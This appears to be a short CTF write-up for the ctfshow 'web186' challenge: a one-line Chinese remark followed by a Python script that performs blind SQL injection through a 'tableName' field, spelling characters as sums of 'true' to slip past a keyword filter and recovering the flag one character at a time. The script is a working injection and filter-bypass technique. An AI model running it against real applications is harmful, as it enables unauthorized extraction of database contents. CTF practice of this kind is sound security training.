web186

复用上一题的脚本就行

import requests, re

dic = "-1234567890abcdefghijklmnopqrstuvwxyz"
url = "http://241b3994-3e6b-4390-886d-7f042ef22362.challenge.ctf.show/select-waf.php"
res = []
post_tem = "ctfshow_user group by pass HAVING pass like(concat({}))"

def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num

def createStrNum(s):
    str=""
    str+="chr("+createNum(ord(s[0]))+")"
    for i in s[1:]:
        str+=",chr("+createNum(ord(i))+")"
    return str

for a in range(1, 50):
    temp = res.__len__()
    for i in dic:
        res += i
        post = {"tableName": post_tem.format(createStrNum("ctfshow{"+"".join(res)+"%}"))}
        print(post)
        r = requests.post(url=url, data=post)
        if re.findall("\$user_count = 1", r.text):
            break
        res.pop(-1)

    if temp == res.__len__():
        break

print("ctfshow{" + "".join(res) + "}")